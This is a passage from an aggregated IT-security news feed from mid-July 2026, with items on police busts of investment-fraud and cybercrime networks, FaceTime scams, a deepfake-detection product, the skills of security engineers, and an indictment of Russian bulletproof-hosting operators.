<h3 data-section-id="1pq15d8" data-start="4480" data-end="4519"><strong>Digital Infrastructure Taken Offline</strong></h3>
<p data-start="4521" data-end="4682">Investigators said the criminal organization remained active since at least 2021 and relied heavily on concealed digital infrastructure to evade law enforcement.</p>
<p data-start="4684" data-end="4963">By tracing financial transactions, IP addresses, and other digital evidence, the Dutch police identified offices, suspects, and critical infrastructure supporting the operation. Authorities worked with commercial service providers to take key elements of the network offline.</p>
<p data-start="4965" data-end="5102">The investigation also involved <a href="https://thecyberexpress.com/europol-traces-55-mn-crypto-digital-piracy/" target="_blank" rel="noopener">Europol</a>, with intelligence shared across multiple countries to support ongoing criminal prosecutions.</p>
<p data-start="5104" data-end="5316" data-is-last-node="" data-is-only-node="">Officials said the case demonstrates the scale and sophistication of modern investment fraud operations and highlighted continued international cooperation to dismantle cyber-enabled financial <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28984">crime</a> networks.</p>

</div>
</div>
</div>
</div>
</div>
</div>
</section></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch police bust investment fraud ring stealing over €100 million]]></title>
<description><![CDATA[The Dutch Police announced the arrest of multiple individuals suspected of being part of an international investment fraud scheme estimated to have tens of thousands of victims. [...]]]></description>
<link>https://tsecurity.de/de/3672006/it-security-nachrichten/dutch-police-bust-investment-fraud-ring-stealing-over-100-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672006/it-security-nachrichten/dutch-police-bust-investment-fraud-ring-stealing-over-100-million/</guid>
<pubDate>Thu, 16 Jul 2026 00:07:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Dutch Police announced the arrest of multiple individuals suspected of being part of an international investment fraud scheme estimated to have tens of thousands of victims. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Patchapalooza packs a punch.]]></title>
<description><![CDATA[Patch Tuesday. SonicWall urges immediate patching of actively exploited vulnerabilities. The White House launches an AI-backed vulnerability clearinghouse. The Air Force contends with widespread cybersecurity quarantines. The UK and EU blame Russia for last year’s cyberattack on Poland’s power gr...]]></description>
<link>https://tsecurity.de/de/3671835/it-security-nachrichten/patchapalooza-packs-a-punch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671835/it-security-nachrichten/patchapalooza-packs-a-punch/</guid>
<pubDate>Wed, 15 Jul 2026 22:51:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Patch Tuesday. SonicWall urges immediate patching of actively exploited vulnerabilities. The White House launches an AI-backed vulnerability clearinghouse. The Air Force contends with widespread cybersecurity quarantines. The UK and EU blame Russia for last year’s cyberattack on Poland’s power grid. Meta faces accusations of AI-assisted layoffs. NATO allies collaborate in space. The Pentagon offers paid cyber apprenticeships. Spanish police dismantle a cybercrime and money-laundering network. Our guest is Clark Frogley, Global Head of Fraud at Quantexa and former FBI agent, discussing the fraud-as-a-service economy and what banks are missing. Grok Build users data is cloudy with a chance of uploads.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading]]></title>
<description><![CDATA[Apple is warning iPhone users about FaceTime scams. Learn how the fraud works, what Apple recommends, and how to report suspicious calls. The post Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading appeared first on TechRepublic. This article…
Read more →
The post Apple Warns Mill...]]></description>
<link>https://tsecurity.de/de/3671683/it-security-nachrichten/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671683/it-security-nachrichten/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple is warning iPhone users about FaceTime scams. Learn how the fraud works, what Apple recommends, and how to report suspicious calls. The post Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading appeared first on TechRepublic. This article…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/">Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading]]></title>
<description><![CDATA[Apple is warning iPhone users about FaceTime scams. Learn how the fraud works, what Apple recommends, and how to report suspicious calls.
The post Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3671465/it-security-nachrichten/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671465/it-security-nachrichten/apple-warns-millions-of-iphone-users-facetime-scams-are-spreading/</guid>
<pubDate>Wed, 15 Jul 2026 19:24:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple is warning iPhone users about FaceTime scams. Learn how the fraud works, what Apple recommends, and how to report suspicious calls.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-apple-facetime-scam-warning-iphone-users/">Apple Warns Millions of iPhone Users: FaceTime Scams Are Spreading</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Student Aid Website Not Working? How to Fix FAFSA & StudentAid.gov Issues]]></title>
<description><![CDATA[If you are trying to submit your Free Application for Federal Student Aid (FAFSA), check your loan balance, or apply for forgiveness, discovering that the student aid website is not working can be incredibly stressful. Millions of students and parents rely on StudentAid.gov, and technical glitche...]]></description>
<link>https://tsecurity.de/de/3670972/windows-tipps/student-aid-website-not-working-how-to-fix-fafsa-studentaidgov-issues/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670972/windows-tipps/student-aid-website-not-working-how-to-fix-fafsa-studentaidgov-issues/</guid>
<pubDate>Wed, 15 Jul 2026 16:28:21 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you are trying to submit your Free Application for Federal Student Aid (FAFSA), check your loan balance, or apply for forgiveness, discovering that the student aid website is not working can be incredibly stressful. Millions of students and parents rely on StudentAid.gov, and technical glitches are unfortunately common during peak seasons and system updates. […]</p>
<p>The post <a href="https://mspoweruser.com/student-aid-website-not-working-how-to-fix-fafsa-studentaid-gov-issues/">Student Aid Website Not Working? How to Fix FAFSA &amp; StudentAid.gov Issues</a> appeared first on <a href="https://mspoweruser.com/">MSPoweruser</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanish police dismantle €140 million cybercrime network]]></title>
<description><![CDATA[Spanish National Police have dismantled a cybercrime network accused of stealing and laundering about €140 million through fake investment platforms, CEO fraud, invoice fraud, and man-in-the-middle attacks. Four people were arrested as part of the operation: two in Portugal, one…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3670697/it-security-nachrichten/spanish-police-dismantle-140-million-cybercrime-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670697/it-security-nachrichten/spanish-police-dismantle-140-million-cybercrime-network/</guid>
<pubDate>Wed, 15 Jul 2026 14:50:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Spanish National Police have dismantled a cybercrime network accused of stealing and laundering about €140 million through fake investment platforms, CEO fraud, invoice fraud, and man-in-the-middle attacks. Four people were arrested as part of the operation: two in Portugal, one…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/spanish-police-dismantle-e140-million-cybercrime-network/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/spanish-police-dismantle-e140-million-cybercrime-network/">Spanish police dismantle €140 million cybercrime network</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanish police dismantle €140 million cybercrime network]]></title>
<description><![CDATA[Spanish National Police have dismantled a cybercrime network accused of stealing and laundering about €140 million through fake investment platforms, CEO fraud, invoice fraud, and man-in-the-middle attacks. Four people were arrested as part of the operation: two in Portugal, one in Spain, and one...]]></description>
<link>https://tsecurity.de/de/3670569/it-security-nachrichten/spanish-police-dismantle-140-million-cybercrime-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670569/it-security-nachrichten/spanish-police-dismantle-140-million-cybercrime-network/</guid>
<pubDate>Wed, 15 Jul 2026 14:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Spanish National Police have dismantled a cybercrime network accused of stealing and laundering about €140 million through fake investment platforms, CEO fraud, invoice fraud, and man-in-the-middle attacks. Four people were arrested as part of the operation: two in Portugal, one in Spain, and one in Panama. The investigation began after officers identified 19 companies whose financial activity appeared consistent with money laundering rather than legitimate business activity. Officers reviewed bank records, examined company registrations and … <a href="https://www.helpnetsecurity.com/2026/07/15/cybercrime-network-investment-fraud-spain/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/15/cybercrime-network-investment-fraud-spain/">Spanish police dismantle €140 million cybercrime network</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Polygraf AI Meeting Guard delivers real-time deepfake detection for enterprise meetings]]></title>
<description><![CDATA[Polygraf AI has announced Meeting Guard, a real-time AI fraud detection solution for enterprise meetings built to detect fraud and protect meeting security. AI can clone a voice, animate a face, and answer every interview question in real time, making trust signals obsolete across hiring processe...]]></description>
<link>https://tsecurity.de/de/3670501/it-security-nachrichten/polygraf-ai-meeting-guard-delivers-real-time-deepfake-detection-for-enterprise-meetings/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670501/it-security-nachrichten/polygraf-ai-meeting-guard-delivers-real-time-deepfake-detection-for-enterprise-meetings/</guid>
<pubDate>Wed, 15 Jul 2026 13:36:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Polygraf AI has announced Meeting Guard, a real-time AI fraud detection solution for enterprise meetings built to detect fraud and protect meeting security. AI can clone a voice, animate a face, and answer every interview question in real time, making trust signals obsolete across hiring processes, executive meetings, vendor calls, and enterprise collaboration. Organizations are increasingly facing AI hiring fraud, deepfake executive impersonation, live PII exposure, and nation-state infiltration attempts that exploit the trust built … <a href="https://www.helpnetsecurity.com/2026/07/15/polygraf-ai-meeting-guard-delivers-real-time-deepfake-detection-for-enterprise-meetings/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/15/polygraf-ai-meeting-guard-delivers-real-time-deepfake-detection-for-enterprise-meetings/">Polygraf AI Meeting Guard delivers real-time deepfake detection for enterprise meetings</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 skills and traits of elite security engineers]]></title>
<description><![CDATA[Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.



Finding not just...]]></description>
<link>https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</guid>
<pubDate>Wed, 15 Jul 2026 09:08:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.</p>



<p class="wp-block-paragraph">Finding not just qualified security engineers, but the best and brightest available, needs to be a priority for CISOs and others overseeing security at their organizations. That’s especially true with the rapid rise of AI and the threats that brings to the enterprise.</p>



<p class="wp-block-paragraph">Here are some of the key skills and traits of elite security engineers to look for when hiring — or to acquire in order to uplevel your cybersecurity career.</p>



<h2 class="wp-block-heading">Acumen with AI-powered tools</h2>



<p class="wp-block-paragraph">These days, AI-related skills are in demand regardless of domain, and this certainly applies to security engineers. There’s a wealth of solutions leveraging AI in the market, tools that engineers can add to their defense arsenal.</p>



<p class="wp-block-paragraph">“AI is transforming security engineering from reactive alerting to predictive threat detection,” says Praveen Margabandhu, digital engineering anchor at financial services firm Navy Federal Credit Union. “AI-driven anomaly detection now identifies behavioral patterns that indicate fraud or compromise before traditional threshold-based systems would fire. This shifts the security engineer’s role from incident responder to threat model designer.”</p>



<p class="wp-block-paragraph">AI-powered tools have taken over a large portion of the detection and triage work that used to be the core of a security engineer’s day, says Maruf Ahmed, cofounder and CEO of global tech staffing firm Dexian. “Vulnerability scanning runs on its own now,” he says. “Threat flagging that used to require a team pulling through logs for hours happens in minutes.”</p>



<p class="wp-block-paragraph">This has freed up capacity on most security teams and changed what the day-to-day work looks like, Ahmed says. “With detection increasingly automated, the engineer’s value sits more in interpreting what gets flagged and deciding what to do about it,” he says.</p>



<h2 class="wp-block-heading">Keen understanding of emerging and established AI threats</h2>



<p class="wp-block-paragraph">Engineers must also have a thorough understanding of the risks AI presents, including <strong><a href="https://www.csoonline.com/article/4154222/6-ways-attackers-abuse-ai-services-to-hack-your-business.html">AI-enhanced cyberattacks</a> using</strong><strong> </strong>large language models (LLMs) to automate and scale <a href="https://www.csoonline.com/article/3819176/top-5-ways-attackers-use-generative-ai-to-exploit-your-systems.html">highly personalized social engineering attacks</a>, craft sophisticated malware, and generate deepfakes.</p>



<p class="wp-block-paragraph">Other <a href="https://www.csoonline.com/article/4110008/top-cyber-threats-to-your-ai-systems-and-infrastructure.html">AI threats they need to be aware of</a> include prompt injections, data and model poisoning, disclosure of sensitive information, model theft, supply chain compromises, and excessive agency.</p>



<p class="wp-block-paragraph">“The same generative tools that help security teams work faster are available to adversaries, and it shows,” Ahmed says. “Phishing campaigns read better and land more precisely than they did a year ago. Social engineering is harder to catch when the language is polished and tailored to the target, and security engineers are now defending against threats built with the same class of technology they use on the defensive side.”</p>



<p class="wp-block-paragraph">That has raised the bar for what reliable detection looks like, Ahmed says. “The objective shift I hear most from clients is about trust in their own systems,” he says. “Two years ago, the priority was visibility — making sure you could see across your environment. Most organizations have that now. The harder problem is knowing whether what those tools are telling you holds up under scrutiny and having people on the team who can stand behind those findings in front of a regulator or a board.”</p>



<h2 class="wp-block-heading">Appreciation of performance and business goals</h2>



<p class="wp-block-paragraph">The best security engineers understand how performance and security intersect, says Margabandhu, who leads performance engineering across Navy Federal Credit Union’s digital banking infrastructure, including real-time fraud detection, identity and access management, and cybersecurity infrastructure resilience.</p>



<p class="wp-block-paragraph">“A fraud detection system that is secure but too slow to catch transactions in real-time is not secure at all,” Margabandhu says. “Elite engineers optimize for both simultaneously.”</p>



<p class="wp-block-paragraph">Engineers must be able to put things in business context, Ahmed says. “An engineer who can work across domains, validate AI outputs, and learn new tools fast is valuable. But that value compounds when the person also understands what the organization is trying to protect and why,” he says.</p>



<p class="wp-block-paragraph">Security engineers who understand the business make better risk decisions, write more effective policies, and generate less friction with the teams around them, Ahmed says. “That is the profile employers are hiring toward right now, and it is where the talent shortage is most pronounced,” he says.</p>



<h2 class="wp-block-heading">Systems mindset</h2>



<p class="wp-block-paragraph">“One of the biggest misconceptions in cybersecurity hiring is that elite security engineers are defined purely by technical certifications or tool familiarity,” says Juan Mathews Rebello Santos, an independent cybersecurity researcher and ethical hacker.</p>



<p class="wp-block-paragraph">“Technical skill absolutely matters, but the strongest engineers I’ve worked with consistently share a combination of analytical thinking, operational adaptability, communication ability, and deep systems understanding,” Santos says.</p>



<p class="wp-block-paragraph">Elite security engineers understand how infrastructure, cloud services, identity systems, applications, APIs, networks, users, and business operations connect, Santos says.</p>



<p class="wp-block-paragraph">“Modern attacks rarely target a single isolated component anymore,” he says. “Threat actors chain together weaknesses across environments. Engineers who can understand those relationships holistically are significantly more effective at both prevention and incident response.”</p>



<h2 class="wp-block-heading">Cross-disciplinary fluency and broad stack know-how</h2>



<p class="wp-block-paragraph">Being an elite software engineer today means having a range of technology experience and knowledge. “Organizations want engineers who can work across more of the stack than they used to,” Ahmed says. “A role that might have asked for deep specialization in one area now expects someone who can move between cloud infrastructure, application security, and compliance without needing a handoff at every boundary.”</p>



<p class="wp-block-paragraph">The attack surface has continued to get wider, and the job descriptions for security engineers has followed suit. “That cross-domain fluency matters because security incidents rarely stay contained in one layer,” Ahmed says. “The engineer who can follow a problem from the network through the application to the data governance framework resolves it faster, with fewer people involved.”</p>



<p class="wp-block-paragraph">The strongest security engineers bridge infrastructure, application, and business domains, Margabandhu says. “They can speak to a CISO, a developer, and a cloud architect in the same conversation,” he says. “An engineer who can explain what an authentication problem means for fraud exposure moves faster in a room full of executives than one who can only describe it in infrastructure terms. I’ve watched technically brilliant people lose that race repeatedly.”<br><br></p>



<p class="wp-block-paragraph">Having the ability to communicate technical risk clearly to non-technical leadership can mean the difference between success and failure of attacks.</p>



<p class="wp-block-paragraph">“Many security failures today are not caused by lack of tooling, but by misalignment between technical teams and business decision-makers,” Santos says. “Elite engineers can explain operational risk, prioritization, and security tradeoffs in language executives understand.”</p>



<h2 class="wp-block-heading">Deep understanding of third-party risk and non-human threats</h2>



<p class="wp-block-paragraph">Threats can come from anywhere, including supply chains and non-human combatants. Third-party cybersecurity risks are on the rise. The 2026 Global CISO Leadership Report by executive search firm Hitch Partners, based on a survey of more than 625 information security executives across the US and Canada, says 43% put third-party risks as the No. 1 priority.</p>



<p class="wp-block-paragraph">“Most teams are still better at securing what they own than securing what they depend on,” Margabandhu says. “The mental shift from perimeter thinking to dependency thinking is real and not everyone has made it. The engineers who treat <a href="https://www.csoonline.com/article/4148315/apis-are-the-new-perimeter-heres-how-cisos-are-securing-them.html">every API call</a>, every credentialed vendor, every third-party model as part of their attack surface approach design differently.”</p>



<p class="wp-block-paragraph">Another growing source of potential threats are not human. <a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Machine identities</a> now outnumber human identities by ratios exceeding 100 to 1 in most enterprise environments, with some sectors closer to 500 to 1, according to the ManageEngine Identity Security Outlook 2026 report.</p>



<p class="wp-block-paragraph">This includes service accounts, API keys, automation tokens, and AI agents, any one of which can present data governance and security risks.</p>



<p class="wp-block-paragraph">Many organizations are still managing machine identities through manual processes that weren’t designed for scale, Margabandhu says. “Engineers who understand non-human identity governance are rare and increasingly important. This is not a future problem.”<br><br></p>



<h2 class="wp-block-heading">Willingness to keep learning</h2>



<p class="wp-block-paragraph">Security engineers need to have a desire to never stopped learning.</p>



<p class="wp-block-paragraph">“That sounds obvious until you work with people who’ve been doing this for 15 years and are still operating from the same threat models they built in 2012,” Margabandhu says. “Security changes fast enough that standing still is the same as going backwards.”</p>



<p class="wp-block-paragraph">The security engineers who keep up aren’t reading one report a year. “They’re genuinely curious about what attackers are doing right now, this month, and they adjust how they think accordingly,” Margabandhu says. “That quality is harder to hire for than most technical skills, because it’s not on a resume.”<br><br></p>



<p class="wp-block-paragraph">With AI presenting new and more sophisticated threats, keeping up with the latest developments is perhaps more important than ever. “Strong engineers are naturally investigative,” Santos says. “They actively study attack techniques, test assumptions, reverse engineer failures, and continuously adapt their understanding of risk.”</p>



<p class="wp-block-paragraph">The best security engineers are often the people who remain intellectually uncomfortable because they know the landscape is always evolving, Santos says.</p>



<p class="wp-block-paragraph">Employers have started paying closer attention to how fast someone can learn, Ahmed says. “The threat landscape and the defensive toolkit are both moving faster than any certification program can track, so hiring managers are probing for adaptability in interviews: how candidates have responded to recent shifts, whether they have picked up unfamiliar platforms on their own, how they work through problems they have not seen before,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure]]></title>
<description><![CDATA[Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled ransomware, malware, phishing, and other cybercriminal activities, resulting in more than $62 million in losses to victims acros...]]></description>
<link>https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</guid>
<pubDate>Wed, 15 Jul 2026 07:06:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Three Russian cybercrime indictment" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="443" data-end="800">Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled <a href="https://thecyberexpress.com/ransomware-sanctions-target-vpn/" target="_blank" rel="noopener">ransomware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-avrecon-malware/" target="_blank" rel="noopener">malware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-malicious-traffic/" target="_blank" rel="noopener">phishing</a>, and other cybercriminal activities, resulting in more than $62 million in losses to victims across the United States and several other countries.</p>
<p data-start="802" data-end="1133">The U.S. Attorney's Office for the Northern District of Ohio announced the unsealing of the indictment following a seven-year investigation. Alongside the criminal charges, the U.S. Department of State is offering a <a href="https://rewardsforjustice.net/rewards/media-land/" target="_blank" rel="nofollow noopener">reward of up to $10 million </a>for information on foreign government-linked associates connected to the operation.</p>

<h3 data-section-id="1cu3nlp" data-start="1135" data-end="1188"><strong>Three Russian Nationals and Two Companies Indicted</strong></h3>
<p data-start="1190" data-end="1260">A federal grand jury returned the indictment in December 2024 against:</p>

<ul data-start="1262" data-end="1481">
 	<li data-section-id="11gkvxj" data-start="1262" data-end="1328">Alexander Alexandrovich Volosovik, 43, of St. Petersburg, Russia</li>
 	<li data-section-id="1lbppu8" data-start="1329" data-end="1389">Kirill Andreevich Zatolokin, 34, of St. Petersburg, Russia</li>
 	<li data-section-id="1myt66t" data-start="1390" data-end="1449">Yulia Vladimirovna Pankova, 29, of St. Petersburg, Russia</li>
 	<li data-section-id="byn7yg" data-start="1450" data-end="1466">Media Land LLC</li>
 	<li data-section-id="qi6id" data-start="1467" data-end="1481">ML.Cloud LLC</li>
</ul>
<p data-start="1483" data-end="1624">The defendants face charges including conspiracy to commit computer <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28967">fraud</a>, wire fraud, money laundering, and aiding cybercriminal activities.</p>
<p data-start="1483" data-end="1624"><img class="aligncenter wp-image-113102 size-full" src="https://thecyberexpress.com/wp-content/uploads/Russian-cybercrime-indictment-e1784090682124.webp" alt="Russian cybercrime indictment" width="600" height="410"></p>
<p data-start="1626" data-end="1832">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28964">General</a> A. Tysen Duva <a href="https://www.justice.gov/usao-ndoh/pr/three-russian-nationals-indicted-international-cybercrimes-resulting-more-62m-losses" target="_blank" rel="nofollow noopener">said</a> the defendants allegedly operated criminal infrastructure from overseas that supported attacks against U.S. critical institutions and placed the public at risk.</p>

<h3 data-section-id="coypn0" data-start="1834" data-end="1900"><strong><span role="text">Bulletproof Hosting Allegedly Enabled Cybercrime Operations</span></strong></h3>
<p data-start="1902" data-end="2111">According to court documents, Media Land, owned by Volosovik, and ML.Cloud, owned by Pankova, provided <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28970">internet</a> infrastructure and server hosting services designed to help cybercriminals evade law enforcement.</p>
<p data-start="2113" data-end="2296">Authorities allege the companies operated from St. Petersburg while maintaining infrastructure in multiple countries, including China, Finland, the Netherlands, and the United States.</p>
<p data-start="2298" data-end="2577">The businesses allegedly offered bulletproof hosting services that enabled criminal clients to deploy malware and ransomware, extort victims for money and <a href="https://thecyberexpress.com/cryptocurrency-mixing-service-bitcoin-seized/" target="_blank" rel="noopener">cryptocurrency</a>, register fraudulent domains, operate criminal marketplaces, and launch phishing and brute-force attacks.</p>
<p data-start="2579" data-end="2738">Investigators said the companies also provided technical support to cybercriminal customers, allowing malicious campaigns to continue while avoiding detection.</p>

<h3 data-section-id="108i6jp" data-start="2740" data-end="2792"><strong>Victims Spanned Critical Sectors Across 21 States</strong></h3>
<p data-start="2794" data-end="2908">Officials said the operation targeted dozens of organizations across 21 U.S. states as well as multiple countries.</p>
<p data-start="2910" data-end="2927">Victims included:</p>

<ul data-start="2929" data-end="2998">
 	<li data-section-id="16y39h9" data-start="2929" data-end="2936">Banks</li>
 	<li data-section-id="1tvaq5r" data-start="2937" data-end="2946">Schools</li>
 	<li data-section-id="1khey9s" data-start="2947" data-end="2968">Government entities</li>
 	<li data-section-id="1k0ubkf" data-start="2969" data-end="2980">Hospitals</li>
 	<li data-section-id="1q2cyct" data-start="2981" data-end="2998">Media companies</li>
</ul>
<p data-start="3000" data-end="3124">Communities affected in Ohio included Akron, Brookfield, Canton, Cleveland, Elyria, Medina, Findlay, Solon, and Valley View.</p>
<p data-start="3000" data-end="3124"><img class="aligncenter wp-image-113103 size-full" src="https://thecyberexpress.com/wp-content/uploads/3-Russian-cybercrime-indictment-e1784090783177.webp" alt="Russian cybercrime indictment" width="600" height="400"></p>
<p data-start="3126" data-end="3384">Additional affected states included California, Florida, Georgia, Illinois, Louisiana, Maryland, Massachusetts, Michigan, Minnesota, New Hampshire, New York, North Carolina, Pennsylvania, Tennessee, Texas, Utah, Virginia, Washington, Wisconsin, and Delaware.</p>
<p data-start="3386" data-end="3515">International victims were identified in Australia, Canada, the European Union, the United Arab Emirates, and the United Kingdom.</p>
<p data-start="3517" data-end="3715"><a href="https://thecyberexpress.com/e-note-crypto-exchange-seized/" target="_blank" rel="noopener">FBI Cyber Division</a> Assistant Director Brett Leatherman said Media Land enabled malicious activity that caused tens of millions of dollars in losses while impacting victims across multiple countries.</p>

<h3 data-section-id="10nhdi" data-start="3717" data-end="3750"><strong>Russian Cybercrime Indictment Prompts $10 Million Reward Offer</strong></h3>
<p data-start="3752" data-end="4051">The U.S. Department of State's Rewards for Justice program announced a reward of up to $10 million for actionable information regarding foreign government-linked associates of the indicted individuals, their malicious <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28968">cyber</a> activities, or foreign government-linked use of Media Land or ML.Cloud.</p>
<p data-start="4053" data-end="4147">The program also noted that relocation assistance may be available for qualifying information.</p>

<h3 data-section-id="atkbpo" data-start="4149" data-end="4191"><strong>International Sanctions Expand Pressure</strong></h3>
